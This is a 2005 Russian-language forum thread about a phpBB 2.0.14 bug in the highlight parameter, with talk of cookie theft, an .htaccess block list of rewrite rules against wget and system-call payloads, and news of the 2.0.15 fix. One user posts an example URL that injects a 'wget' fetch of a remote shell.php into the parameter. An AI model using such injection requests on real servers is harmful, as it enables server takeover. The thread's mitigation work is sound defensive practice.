Уязвимость phpbb 2.0.14

sigal · Сообщение **sigal** » 05.05.2005 23:34

так блин в чем тогда баг????????
как его сделать.??? мне протестировать надо!!!!!

alexenin · Сообщение **alexenin** » 05.05.2005 23:36

На чужом сайте могут достать куку для вашего форума через браузер "не подозревающего пользователя", ну и хай с ним.

Этот баг касается пользователей закрытых форумом. Ну и админов.

quazi · Сообщение **quazi** » 05.05.2005 23:47

вообще-то эта уязвимость не версии 2.0.14
скорее всего, она существовала и раньше

Егор Наклоняев · 05.05.2005 23:53

quazi
Естественно, существовало. Там же написано.

Знаете, мне пофигу что делает этот баг, и что можно вредного туда запихнуть, я не кулхацкер - я пожилой мужчина обремененный семьёй, детьми и домашними животными. Я заметил, что он даёт искажения внешнего вида страницы, ergo при определенных условиях он может дать какую-либо бяку. Посему не мудрствуя лукаво зарезал на будущее все запросы такого вида и настучал в phpBB.com.

Dixi.

quazi · Сообщение **quazi** » 06.05.2005 1:09

зарезал на будущее все запросы такого вида и настучал в phpBB.com

Егор Наклоняев, ай малатцца!!

Slimmy · Сообщение **Slimmy** » 06.05.2005 10:12

sigal, опять-таки, этот баг (если можно Это назвать так) может быть полезен взломщику только если у хостера руки кривые.
Например, если хостер чмо, то поправив запрос можно изменить запрос

Код: Выделить всё

http://www.example.com/phpBB2/viewtopic.php?p=3&highlight=\[]\

на

Код: Выделить всё

http://www.example.com/phpBB2/viewtopic.php?p=3&highlight=wget%20site.com/shell.php

и кранты серверу))

А если у тебя не появилось ничего подозрительного при попытке ПЕРВОГО запроса, то беспокоится не о чем.

Netman · Сообщение **Netman** » 07.05.2005 13:34

Простите, но я так и не понял.
Что делать? Или ничего пока не делать.

apaxuc · Сообщение **apaxuc** » 07.05.2005 14:19

Ошибка имела место быть в 13 версии.
После форматирования .httaccess все стало хорошо,
за что и благодарим очень и очень нашего доктора
Егора Наклоняева!

Спасибо!!

boom · Сообщение **boom** » 07.05.2005 16:52

Отцы! Покажите, пожалуйста, актуальное содержание .htaccess для форума. У меня там пару строк есть, но чую не доброе... Грустно и как то жалко...

apaxuc · Сообщение **apaxuc** » 07.05.2005 17:07

boom писал(а):Отцы! Покажите, пожалуйста, актуальное содержание .htaccess для форума. У меня там пару строк есть, но чую не доброе... Грустно и как то жалко...

<IfModule mod_charset.c>
CharsetRecodeMultipartForms off
</IfModule>

RewriteEngine on
RewriteBase /
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\\\[ [OR]
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^(.*)$ http://127.0.0.1/ [L,R=permanent]

Кладеца в корень форума.

Rick · Сообщение **Rick** » 08.05.2005 0:43

Вышла версия 2.0.15, в которой этот баг фиксится (Fixed bug in highlight code to escape characters correctly)
http://www.phpbbguru.net/community/viewtopic.php?t=2888